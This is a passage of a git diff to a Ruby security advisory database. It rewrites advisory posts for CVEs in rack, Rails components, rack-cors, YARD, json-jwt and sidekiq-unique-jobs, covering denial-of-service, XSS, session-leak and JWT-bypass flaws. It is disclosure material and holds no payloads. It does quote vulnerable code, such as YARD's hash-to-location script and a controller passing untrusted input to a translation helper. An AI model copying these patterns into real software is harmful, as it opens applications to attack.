+    Versions Affected: >= 0.4 Not affected: < 0.4 Fixed Versions: 3.0.9.1, 2.2.8.1
+
+    # Impact
+
+    Carefully crafted content type headers can cause Rack’s media type parser to
+    take much longer than expected, leading to a possible denial of service
+    vulnerability.
+
+    Impacted code will use Rack’s media type parser to parse content type headers.
+    This code will look like below:
+
+    ```
+    request.media_type
+
+    ## OR
+    request.media_type_params
+
+    ## OR
+    Rack::MediaType.type(content_type)
+    ```
+
+    Some frameworks (including Rails) call this code internally, so upgrading is
+    recommended!
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 0.4"
+  patched_versions:
+  - "~> 2.2.8, >= 2.2.8.1"
+  - ">= 3.0.9.1"
+  related:
+    url:
+    - https://github.com/rack/rack/releases/tag/v3.0.9.1
+    - https://github.com/rack/rack/releases/tag/v2.2.8.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-25126
+    - https://access.redhat.com/security/cve/cve-2024-25126
+    - https://ubuntu.com/security/CVE-2024-25126
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-26141.md b/advisories/_posts/2024-02-21-CVE-2024-26141.md
index ddfdc075..b3bbd1a6 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-26141.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-26141.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2024-26141 (rack): Possible DoS Vulnerability with Range Header in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2024-26141
-  ghsa: xj5v-6v4g-jfw6
-  url: https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944
-  title: Possible DoS Vulnerability with Range Header in Rack
-  date: 2024-02-21
-  description: |
-    There is a possible DoS vulnerability relating to the Range request header in
-    Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.
-
-    Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1
-
-    # Impact
-
-    Carefully crafted Range headers can cause a server to respond with an
-    unexpectedly large response. Responding with such large responses could lead
-    to a denial of service issue.
-
-    Vulnerable applications will use the `Rack::File` middleware or the
-    `Rack::Utils.byte_ranges` methods (this includes Rails applications).
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  unaffected_versions:
-  - "< 1.3.0"
-  patched_versions:
-  - "~> 2.2.8, >= 2.2.8.1"
-  - ">= 3.0.9.1"
-  related:
-    url:
-    - https://github.com/rack/rack/releases/tag/v3.0.9.1
-    - https://github.com/rack/rack/releases/tag/v2.2.8.1
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-25141
-    - https://access.redhat.com/security/cve/cve-2024-26141
-    - https://ubuntu.com/security/CVE-2024-26141
----
+---
+layout: advisory
+title: 'CVE-2024-26141 (rack): Possible DoS Vulnerability with Range Header in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2024-26141
+  ghsa: xj5v-6v4g-jfw6
+  url: https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944
+  title: Possible DoS Vulnerability with Range Header in Rack
+  date: 2024-02-21
+  description: |
+    There is a possible DoS vulnerability relating to the Range request header in
+    Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.
+
+    Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1
+
+    # Impact
+
+    Carefully crafted Range headers can cause a server to respond with an
+    unexpectedly large response. Responding with such large responses could lead
+    to a denial of service issue.
+
+    Vulnerable applications will use the `Rack::File` middleware or the
+    `Rack::Utils.byte_ranges` methods (this includes Rails applications).
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  unaffected_versions:
+  - "< 1.3.0"
+  patched_versions:
+  - "~> 2.2.8, >= 2.2.8.1"
+  - ">= 3.0.9.1"
+  related:
+    url:
+    - https://github.com/rack/rack/releases/tag/v3.0.9.1
+    - https://github.com/rack/rack/releases/tag/v2.2.8.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-25141
+    - https://access.redhat.com/security/cve/cve-2024-26141
+    - https://ubuntu.com/security/CVE-2024-26141
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-26142.md b/advisories/_posts/2024-02-21-CVE-2024-26142.md
index 4c211068..2b724d58 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-26142.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-26142.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-26142 (actionpack): Possible ReDoS vulnerability in Accept header
-  parsing in Action Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-26142
-  ghsa: jjhx-jhvp-74wq
-  url: https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946
-  title: Possible ReDoS vulnerability in Accept header parsing in Action Dispatch
-  date: 2024-02-21
-  description: |
-    There is a possible ReDoS vulnerability in the Accept header parsing routines
-    of Action Dispatch. This vulnerability has been assigned the CVE identifier
-    CVE-2024-26142.
-
-    Versions Affected: >= 7.1.0, < 7.1.3.1 Not affected: < 7.1.0 Fixed Versions: 7.1.3.1
-
-    # Impact
-
-    Carefully crafted Accept headers can cause Accept header parsing in
-    Action Dispatch to take an unexpected amount of time, possibly resulting in a
-    DoS vulnerability. All users running an affected release should either upgrade
-    or use one of the workarounds immediately.
-
-    Ruby 3.2 has mitigations for this problem, so Rails applications using
-    Ruby 3.2 or newer are unaffected.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  unaffected_versions:
-  - "< 7.1.0"
-  patched_versions:
-  - ">= 7.1.3.1"
----
+---
+layout: advisory
+title: 'CVE-2024-26142 (actionpack): Possible ReDoS vulnerability in Accept header
+  parsing in Action Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-26142
+  ghsa: jjhx-jhvp-74wq
+  url: https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946
+  title: Possible ReDoS vulnerability in Accept header parsing in Action Dispatch
+  date: 2024-02-21
+  description: |
+    There is a possible ReDoS vulnerability in the Accept header parsing routines
+    of Action Dispatch. This vulnerability has been assigned the CVE identifier
+    CVE-2024-26142.
+
+    Versions Affected: >= 7.1.0, < 7.1.3.1 Not affected: < 7.1.0 Fixed Versions: 7.1.3.1
+
+    # Impact
+
+    Carefully crafted Accept headers can cause Accept header parsing in
+    Action Dispatch to take an unexpected amount of time, possibly resulting in a
+    DoS vulnerability. All users running an affected release should either upgrade
+    or use one of the workarounds immediately.
+
+    Ruby 3.2 has mitigations for this problem, so Rails applications using
+    Ruby 3.2 or newer are unaffected.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  unaffected_versions:
+  - "< 7.1.0"
+  patched_versions:
+  - ">= 7.1.3.1"
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-26143.md b/advisories/_posts/2024-02-21-CVE-2024-26143.md
index 985e3dc7..79205f75 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-26143.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-26143.md
@@ -1,67 +1,67 @@
----
-layout: advisory
-title: 'CVE-2024-26143 (actionpack): Possible XSS Vulnerability in Action Controller'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-26143
-  ghsa: 9822-6m93-xqf4
-  url: https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947
-  title: Possible XSS Vulnerability in Action Controller
-  date: 2024-02-21
-  description: |
-    There is a possible XSS vulnerability when using the translation helpers
-    (`translate`, `t`, etc) in Action Controller. This vulnerability has been
-    assigned the CVE identifier CVE-2024-26143.
-
-    Versions Affected: >= 7.0.0
-    Not affected: < 7.0.0
-    Fixed Versions: 7.1.3.1, 7.0.8.1
-
-    # Impact
-
-    Applications using translation methods like `translate`, or `t` on a
-    controller, with a key ending in “_html”, a `:default` key which contains
-    untrusted user input, and the resulting string is used in a view, may be
-    susceptible to an XSS vulnerability.
-
-    For example, impacted code will look something like this:
-
-    ```
-    class ArticlesController < ApplicationController
-      def show
-        @message = t("message_html", default: untrusted_input)
-        # The `show` template displays the contents of `@message`
-      end
-    end
-    ```
-
-    To reiterate the pre-conditions, applications must:
-
-    * Use a translation function from a controller (i.e. *not* `I18n.t`, or
-    `t` from a view)
-    * Use a key that ends in `_html`
-    * Use a default value where the default value is untrusted and unescaped input
-    * Send the text to the victim (whether that’s part of a template, or a
-      `render` call)
-
-    All users running an affected release should either upgrade or use one of the workarounds immediately.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 7.0.0"
-  patched_versions:
-  - "~> 7.0.8, >= 7.0.8.1"
-  - ">= 7.1.3.1"
----
+---
+layout: advisory
+title: 'CVE-2024-26143 (actionpack): Possible XSS Vulnerability in Action Controller'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-26143
+  ghsa: 9822-6m93-xqf4
+  url: https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947
+  title: Possible XSS Vulnerability in Action Controller
+  date: 2024-02-21
+  description: |
+    There is a possible XSS vulnerability when using the translation helpers
+    (`translate`, `t`, etc) in Action Controller. This vulnerability has been
+    assigned the CVE identifier CVE-2024-26143.
+
+    Versions Affected: >= 7.0.0
+    Not affected: < 7.0.0
+    Fixed Versions: 7.1.3.1, 7.0.8.1
+
+    # Impact
+
+    Applications using translation methods like `translate`, or `t` on a
+    controller, with a key ending in “_html”, a `:default` key which contains
+    untrusted user input, and the resulting string is used in a view, may be
+    susceptible to an XSS vulnerability.
+
+    For example, impacted code will look something like this:
+
+    ```
+    class ArticlesController < ApplicationController
+      def show
+        @message = t("message_html", default: untrusted_input)
+        # The `show` template displays the contents of `@message`
+      end
+    end
+    ```
+
+    To reiterate the pre-conditions, applications must:
+
+    * Use a translation function from a controller (i.e. *not* `I18n.t`, or
+    `t` from a view)
+    * Use a key that ends in `_html`
+    * Use a default value where the default value is untrusted and unescaped input
+    * Send the text to the victim (whether that’s part of a template, or a
+      `render` call)
+
+    All users running an affected release should either upgrade or use one of the workarounds immediately.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 7.0.0"
+  patched_versions:
+  - "~> 7.0.8, >= 7.0.8.1"
+  - ">= 7.1.3.1"
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-26144.md b/advisories/_posts/2024-02-21-CVE-2024-26144.md
index 018ea6c5..c7067d80 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-26144.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-26144.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'CVE-2024-26144 (activestorage): Possible Sensitive Session Information Leak
-  in Active Storage'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2024-26144
-  ghsa: 8h22-8cf7-hq6g
-  url: https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945
-  title: Possible Sensitive Session Information Leak in Active Storage
-  date: 2024-02-21
-  description: |
-    There is a possible sensitive session information leak in Active Storage.
-    By default, Active Storage sends a `Set-Cookie` header along with the user’s
-    session cookie when serving blobs. It also sets `Cache-Control` to public.
-    Certain proxies may cache the `Set-Cookie`, leading to an information leak.
-
-    This vulnerability has been assigned the CVE identifier CVE-2024-26144.
-
-    Versions Affected: >= 5.2.0, < 7.1.0
-
-    Not affected: < 5.2.0, >= 7.1.0
-
-    Fixed Versions: 7.0.8.1, 6.1.7.7
-
-    # Impact
-
-    A proxy which chooses to caches this request can cause users to share
-    sessions. This may include a user receiving an attacker’s session or vice
-    versa.
-
-    This was patched in 7.1.0 but not previously identified as a security
-    vulnerability.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    Upgrade to Rails 7.1.X, or configure caching proxies not to cache the
-    `Set-Cookie` headers.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 5.2.0"
-  - ">= 7.1.0"
-  patched_versions:
-  - "~> 6.1.7, >= 6.1.7.7"
-  - ">= 7.0.8.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-26144
-    - https://hackerone.com/reports/3082917
----
+---
+layout: advisory
+title: 'CVE-2024-26144 (activestorage): Possible Sensitive Session Information Leak
+  in Active Storage'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2024-26144
+  ghsa: 8h22-8cf7-hq6g
+  url: https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945
+  title: Possible Sensitive Session Information Leak in Active Storage
+  date: 2024-02-21
+  description: |
+    There is a possible sensitive session information leak in Active Storage.
+    By default, Active Storage sends a `Set-Cookie` header along with the user’s
+    session cookie when serving blobs. It also sets `Cache-Control` to public.
+    Certain proxies may cache the `Set-Cookie`, leading to an information leak.
+
+    This vulnerability has been assigned the CVE identifier CVE-2024-26144.
+
+    Versions Affected: >= 5.2.0, < 7.1.0
+
+    Not affected: < 5.2.0, >= 7.1.0
+
+    Fixed Versions: 7.0.8.1, 6.1.7.7
+
+    # Impact
+
+    A proxy which chooses to caches this request can cause users to share
+    sessions. This may include a user receiving an attacker’s session or vice
+    versa.
+
+    This was patched in 7.1.0 but not previously identified as a security
+    vulnerability.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    Upgrade to Rails 7.1.X, or configure caching proxies not to cache the
+    `Set-Cookie` headers.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 5.2.0"
+  - ">= 7.1.0"
+  patched_versions:
+  - "~> 6.1.7, >= 6.1.7.7"
+  - ">= 7.0.8.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-26144
+    - https://hackerone.com/reports/3082917
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-26146.md b/advisories/_posts/2024-02-21-CVE-2024-26146.md
index b3925ec2..64ed6fbc 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-26146.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-26146.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2024-26146 (rack): Possible Denial of Service Vulnerability in Rack Header
-  Parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2024-26146
-  ghsa: 54rr-7fvw-6x8f
-  url: https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942
-  title: Possible Denial of Service Vulnerability in Rack Header Parsing
-  date: 2024-02-21
-  description: |
-    There is a possible denial of service vulnerability in the header parsing
-    routines in Rack. This vulnerability has been assigned the CVE identifier
-    CVE-2024-26146.
-
-    Versions Affected: All. Not affected: None Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1
-
-    # Impact
-
-    Carefully crafted headers can cause header parsing in Rack to take longer than
-    expected resulting in a possible denial of service issue. `Accept` and
-    `Forwarded` headers are impacted.
-
-    Ruby 3.2 has mitigations for this problem, so Rack applications using
-    Ruby 3.2 or newer are unaffected.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.4"
-  - "~> 2.1.4, >= 2.1.4.4"
-  - "~> 2.2.8, >= 2.2.8.1"
-  - ">= 3.0.9.1"
-  related:
-    url:
-    - https://github.com/rack/rack/releases/tag/v3.0.9.1
-    - https://github.com/rack/rack/releases/tag/v2.2.8.1
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-26146
-    - https://access.redhat.com/security/cve/cve-2024-26146
-    - https://ubuntu.com/security/CVE-2024-26146
----
+---
+layout: advisory
+title: 'CVE-2024-26146 (rack): Possible Denial of Service Vulnerability in Rack Header
+  Parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2024-26146
+  ghsa: 54rr-7fvw-6x8f
+  url: https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942
+  title: Possible Denial of Service Vulnerability in Rack Header Parsing
+  date: 2024-02-21
+  description: |
+    There is a possible denial of service vulnerability in the header parsing
+    routines in Rack. This vulnerability has been assigned the CVE identifier
+    CVE-2024-26146.
+
+    Versions Affected: All. Not affected: None Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1
+
+    # Impact
+
+    Carefully crafted headers can cause header parsing in Rack to take longer than
+    expected resulting in a possible denial of service issue. `Accept` and
+    `Forwarded` headers are impacted.
+
+    Ruby 3.2 has mitigations for this problem, so Rack applications using
+    Ruby 3.2 or newer are unaffected.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.4"
+  - "~> 2.1.4, >= 2.1.4.4"
+  - "~> 2.2.8, >= 2.2.8.1"
+  - ">= 3.0.9.1"
+  related:
+    url:
+    - https://github.com/rack/rack/releases/tag/v3.0.9.1
+    - https://github.com/rack/rack/releases/tag/v2.2.8.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-26146
+    - https://access.redhat.com/security/cve/cve-2024-26146
+    - https://ubuntu.com/security/CVE-2024-26146
+---
diff --git a/advisories/_posts/2024-02-26-CVE-2024-27456.md b/advisories/_posts/2024-02-26-CVE-2024-27456.md
index b034ac15..4f355f14 100644
--- a/advisories/_posts/2024-02-26-CVE-2024-27456.md
+++ b/advisories/_posts/2024-02-26-CVE-2024-27456.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2024-27456 (rack-cors): Rack CORS Middleware has Insecure File Permissions'
-comments: false
-categories:
-- rack-cors
-advisory:
-  gem: rack-cors
-  cve: 2024-27456
-  ghsa: 785g-282q-pwvx
-  url: https://github.com/advisories/GHSA-785g-282q-pwvx
-  title: Rack CORS Middleware has Insecure File Permissions
-  date: 2024-02-26
-  description: |
-    rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions
-    for the .rb files.
-  unaffected_versions:
-  - "< 2.0.1"
-  patched_versions:
-  - ">= 2.0.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-27456
-    - https://github.com/cyu/rack-cors/issues/274
-    - https://github.com/advisories/GHSA-785g-282q-pwvx
----
+---
+layout: advisory
+title: 'CVE-2024-27456 (rack-cors): Rack CORS Middleware has Insecure File Permissions'
+comments: false
+categories:
+- rack-cors
+advisory:
+  gem: rack-cors
+  cve: 2024-27456
+  ghsa: 785g-282q-pwvx
+  url: https://github.com/advisories/GHSA-785g-282q-pwvx
+  title: Rack CORS Middleware has Insecure File Permissions
+  date: 2024-02-26
+  description: |
+    rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions
+    for the .rb files.
+  unaffected_versions:
+  - "< 2.0.1"
+  patched_versions:
+  - ">= 2.0.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-27456
+    - https://github.com/cyu/rack-cors/issues/274
+    - https://github.com/advisories/GHSA-785g-282q-pwvx
+---
diff --git a/advisories/_posts/2024-02-28-CVE-2024-27285.md b/advisories/_posts/2024-02-28-CVE-2024-27285.md
index 037d3418..2db74f66 100644
--- a/advisories/_posts/2024-02-28-CVE-2024-27285.md
+++ b/advisories/_posts/2024-02-28-CVE-2024-27285.md
@@ -1,76 +1,76 @@
----
-layout: advisory
-title: 'CVE-2024-27285 (yard): YARD''s default template vulnerable to Cross-site Scripting
-  in generated frames.html'
-comments: false
-categories:
-- yard
-advisory:
-  gem: yard
-  cve: 2024-27285
-  ghsa: 8mq4-9jjh-9xrc
-  url: https://github.com/advisories/GHSA-8mq4-9jjh-9xrc
-  title: YARD's default template vulnerable to Cross-site Scripting in generated frames.html
-  date: 2024-02-28
-  description: |2
-
-    ### Summary
-
-    The "frames.html" file within the Yard Doc's generated documentation
-    is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate
-    sanitization of user input within the JavaScript segment of the
-    "frames.erb" template file.
-
-    ### Details
-
-    The vulnerability stems from mishandling user-controlled data retrieved
-    from the URL hash in the embedded JavaScript code within the "frames.erb"
-    template file. Specifically, the script lacks proper sanitization of
-    the hash data before utilizing it to establish the top-level window's
-    location. This oversight permits an attacker to inject malicious
-    JavaScript payloads through carefully crafted URLs.
-
-    Snippet from "frames.erb":
-    (v0.9.34)
-    ```erb
-    <script type="text/javascript">
-      var match = unescape(window.location.hash).match(/^#!(.+)/);
-      var name = match ? match[1] : '<%= url_for_main %>';
-      name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, '');
-      window.top.location = name;
-    </script>
-    ```
-
-    (v0.9.35)
-    ```erb
-    <script type="text/javascript">
-      var match = decodeURIComponent(window.location.hash).match(/^#!(.+)/);
-      var name = match ? match[1] : '<%= url_for_main %>';
-      name = name.replace(/^((\w*):)?[\/\\]*/gm, '').trim();
-      window.top.location.replace(name)
-    </script>
-    ```
-
-    ### Impact
-
-    This XSS vulnerability presents a substantial threat by enabling
-    an attacker to execute arbitrary JavaScript code within the user's
-    session context. Potential ramifications include session hijacking,
-    theft of sensitive data, unauthorized access to user accounts, and
-    defacement of websites. Any user visiting the compromised page is
-    susceptible to exploitation. It is critical to promptly address
-    this vulnerability to mitigate potential harm to users and preserve
-    the application's integrity.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 0.9.36"
-  related:
-    url:
-    - https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc
-    - https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-27285
-    - https://github.com/advisories/GHSA-8mq4-9jjh-9xrc
-    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml
-    - https://github.com/lsegal/yard/pull/1538
-    - https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa
----
+---
+layout: advisory
+title: 'CVE-2024-27285 (yard): YARD''s default template vulnerable to Cross-site Scripting
+  in generated frames.html'
+comments: false
+categories:
+- yard
+advisory:
+  gem: yard
+  cve: 2024-27285
+  ghsa: 8mq4-9jjh-9xrc
+  url: https://github.com/advisories/GHSA-8mq4-9jjh-9xrc
+  title: YARD's default template vulnerable to Cross-site Scripting in generated frames.html
+  date: 2024-02-28
+  description: |2
+
+    ### Summary
+
+    The "frames.html" file within the Yard Doc's generated documentation
+    is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate
+    sanitization of user input within the JavaScript segment of the
+    "frames.erb" template file.
+
+    ### Details
+
+    The vulnerability stems from mishandling user-controlled data retrieved
+    from the URL hash in the embedded JavaScript code within the "frames.erb"
+    template file. Specifically, the script lacks proper sanitization of
+    the hash data before utilizing it to establish the top-level window's
+    location. This oversight permits an attacker to inject malicious
+    JavaScript payloads through carefully crafted URLs.
+
+    Snippet from "frames.erb":
+    (v0.9.34)
+    ```erb
+    <script type="text/javascript">
+      var match = unescape(window.location.hash).match(/^#!(.+)/);
+      var name = match ? match[1] : '<%= url_for_main %>';
+      name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, '');
+      window.top.location = name;
+    </script>
+    ```
+
+    (v0.9.35)
+    ```erb
+    <script type="text/javascript">
+      var match = decodeURIComponent(window.location.hash).match(/^#!(.+)/);
+      var name = match ? match[1] : '<%= url_for_main %>';
+      name = name.replace(/^((\w*):)?[\/\\]*/gm, '').trim();
+      window.top.location.replace(name)
+    </script>
+    ```
+
+    ### Impact
+
+    This XSS vulnerability presents a substantial threat by enabling
+    an attacker to execute arbitrary JavaScript code within the user's
+    session context. Potential ramifications include session hijacking,
+    theft of sensitive data, unauthorized access to user accounts, and
+    defacement of websites. Any user visiting the compromised page is
+    susceptible to exploitation. It is critical to promptly address
+    this vulnerability to mitigate potential harm to users and preserve
+    the application's integrity.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 0.9.36"
+  related:
+    url:
+    - https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc
+    - https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-27285
+    - https://github.com/advisories/GHSA-8mq4-9jjh-9xrc
+    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml
+    - https://github.com/lsegal/yard/pull/1538
+    - https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa
+---
diff --git a/advisories/_posts/2024-02-29-CVE-2023-51774.md b/advisories/_posts/2024-02-29-CVE-2023-51774.md
index 2f036acf..47e5ba54 100644
--- a/advisories/_posts/2024-02-29-CVE-2023-51774.md
+++ b/advisories/_posts/2024-02-29-CVE-2023-51774.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2023-51774 (json-jwt): json-jwt allows bypass of identity checks via a
-  sign/encryption confusion attack'
-comments: false
-categories:
-- json-jwt
-advisory:
-  gem: json-jwt
-  cve: 2023-51774
-  ghsa: c8v6-786g-vjx6
-  url: https://github.com/P3ngu1nW/CVE_Request/blob/main/novjson-jwt.md
-  title: json-jwt allows bypass of identity checks via a sign/encryption confusion
-    attack
-  date: 2024-02-29
-  description: |
-    The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allows
-    bypass of identity checks via a sign/encryption confusion attack.
-    For example, JWE can sometimes be used to bypass JSON::JWT.decode.
-  patched_versions:
-  - "~> 1.15.3, >= 1.15.3.1"
-  - ">= 1.16.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-51774
-    - https://github.com/P3ngu1nW/CVE_Request/blob/main/novjson-jwt.md
-    - https://github.com/advisories/GHSA-c8v6-786g-vjx6
----
+---
+layout: advisory
+title: 'CVE-2023-51774 (json-jwt): json-jwt allows bypass of identity checks via a
+  sign/encryption confusion attack'
+comments: false
+categories:
+- json-jwt
+advisory:
+  gem: json-jwt
+  cve: 2023-51774
+  ghsa: c8v6-786g-vjx6
+  url: https://github.com/P3ngu1nW/CVE_Request/blob/main/novjson-jwt.md
+  title: json-jwt allows bypass of identity checks via a sign/encryption confusion
+    attack
+  date: 2024-02-29
+  description: |
+    The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allows
+    bypass of identity checks via a sign/encryption confusion attack.
+    For example, JWE can sometimes be used to bypass JSON::JWT.decode.
+  patched_versions:
+  - "~> 1.15.3, >= 1.15.3.1"
+  - ">= 1.16.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-51774
+    - https://github.com/P3ngu1nW/CVE_Request/blob/main/novjson-jwt.md
+    - https://github.com/advisories/GHSA-c8v6-786g-vjx6
+---
diff --git a/advisories/_posts/2024-03-01-CVE-2023-46950.md b/advisories/_posts/2024-03-01-CVE-2023-46950.md
index 2c6f09b7..2026bf08 100644
--- a/advisories/_posts/2024-03-01-CVE-2023-46950.md
+++ b/advisories/_posts/2024-03-01-CVE-2023-46950.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2023-46950 (sidekiq-unique-jobs): Cross Site Scripting vulnerability in
-  Contribsys Sidekiq'
-comments: false
-categories:
-- sidekiq-unique-jobs
-advisory:
-  gem: sidekiq-unique-jobs
-  cve: 2023-46950
-  ghsa: fhx8-5c23-x7x5
-  url: https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
-  title: Cross Site Scripting vulnerability in Contribsys Sidekiq
-  date: 2024-03-01
-  description: |
-    Cross Site Scripting vulnerability in Contribsys Sidekiq v.6.5.8
-    allows a remote attacker to obtain sensitive information via a
-    crafted URL to the filter functions.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 7.1.33"
-  - ">= 8.0.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-46950
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/releases/tag/v8.0.7
-    - https://www.mgm-sp.com/cve/sidekiq-unique-jobs-reflected-xss-cve-2023-46950-cve-2023-46951
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/pull/829
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/cd09ba6108f98973b6649a6149790c3d4502b4cc
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed
-    - https://github.com/advisories/GHSA-fhx8-5c23-x7x5
----
+---
+layout: advisory
